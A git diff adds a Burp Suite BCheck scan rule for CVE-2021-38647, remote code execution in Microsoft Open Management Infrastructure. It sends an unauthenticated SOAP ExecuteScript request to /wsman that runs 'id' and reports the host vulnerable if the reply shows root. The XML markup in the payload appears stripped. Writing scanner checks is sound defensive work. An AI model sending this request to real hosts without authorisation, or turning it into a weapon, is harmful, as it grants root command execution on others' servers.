diff --git a/vulnerabilities-CVEd/CVE-2021-38647 - Microsoft Open Management Infrastructure - RCE.bcheck b/vulnerabilities-CVEd/CVE-2021-38647 - Microsoft Open Management Infrastructure - RCE.bcheck
new file mode 100644
index 0000000..626ca5a
--- /dev/null
+++ b/vulnerabilities-CVEd/CVE-2021-38647 - Microsoft Open Management Infrastructure - RCE.bcheck
@@ -0,0 +1,61 @@
+metadata:
+ language: v1-beta
+ name: "CVE-2021-38647 - Microsoft Open Management Infrastructure - RCE"
+ description: "Checks for CVE-2021-38647"
+ author: "Dolph Flynn"
+ tags: "CVE-2021-38647", "omi", "microsoft"
+
+
+given host then
+ send request called check:
+ `POST /wsman HTTP/1.1
+Host: {base.request.url.host}
+Content-Type: application/soap+xml;charset=UTF-8
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+Connection: close
+
+
+
+ HTTP://{base.request.url.host}/wsman/
+ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem
+
+ http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
+
+ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript
+ 102400
+ uuid:00B60932-CC01-0005-0000-000000010000
+ PT1M30S
+
+
+
+
+ root/scx
+
+
+
+
+ aWQ=
+
+ 0
+ true
+
+
+
+`
+
+ if ({check.response.body} matches "\b\b" and {check.response.body} matches "\buid=0(root) gid=0(root) groups=0\b") then
+
+ report issue:
+ severity: high
+ confidence: tentative
+ detail: "Microsoft Open Management Infrastructure - Remote Code Execution."
+
+ end if